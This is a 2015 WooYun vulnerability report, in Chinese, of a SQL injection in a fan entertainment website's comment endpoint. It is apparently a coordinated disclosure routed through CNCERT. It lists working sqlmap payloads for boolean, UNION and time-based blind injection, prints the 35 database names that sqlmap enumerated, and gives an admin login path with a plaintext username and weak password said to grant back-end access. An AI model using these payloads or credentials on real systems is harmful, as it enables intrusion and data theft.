漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0133783
漏洞标题:粉丝网sql盲注 全部35个数据库千张表
相关厂商:cncert国家互联网应急中心
漏洞作者: 人丑嘴不甜
提交时间:2015-08-17 21:56
修复时间:2015-10-03 10:54
公开时间:2015-10-03 10:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开
简要描述:
粉丝网是以web2.0为基础建立的网上娱乐平台,以博客、社会关系网络等技术为基本应用,以娱乐为方向,搭建一个融合资讯、音频、视频、粉丝群(圈子、俱乐部)的综合互动交流网站。是一个专门为粉丝提供各种服务的专业娱乐网站,并致力于成为中华区最有影响与最大的娱乐门户网站。
详细说明:
注入点是在 http://**.**.**.**/comment/getcommenthtml/?psize=3&page=1&targetid=216&sj=1439398698776 中的targetid处boolean盲注
Place: GET
Parameter: targetid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=1&psize=3&sj=1439398698776&targetid=216 AND 3*2*1=6 AND 838=838 AND 4703=4703
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: page=1&psize=3&sj=1439398698776&targetid=216 AND 3*2*1=6 AND 838=838 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7172786171,0x626f4c79756f446b4b50,0x7179757471),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: page=1&psize=3&sj=1439398698776&targetid=216 AND 3*2*1=6 AND 838=838 AND SLEEP(5)
---
[08:27:34] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.11
[08:27:34] [INFO] fetching database names
[08:27:34] [WARNING] reflective value(s) found and filtering out
available databases [35]:
[*] bak
[*] bobo_group_log
[*] bobo_groups
[*] bug
[*] column_7up
[*] dmm
[*] dzhs
[*] feature
[*] gamecenter
[*] group_log
[*] groups
[*] groups09
[*] ichat
[*] idata
[*] idata_bak
[*] idol
[*] ilog
[*] information_schema
[*] ishow
[*] jdata
[*] jlog
[*] kt250
[*] money
[*] moneystate
[*] mysql
[*] new250
[*] openads
[*] paimai
[*] sbgl
[*] special
[*] tangmm
[*] test
[*] treasure
[*] walls
[*] walls_log
后台地址http://**.**.**.**/admin/login
用户名 admin
密码 123456qwe
进入后台
漏洞证明:
修复方案:
过滤
版权声明:转载请注明来源 人丑嘴不甜@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-08-19 10:53
厂商回复:
CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。
最新状态:
暂无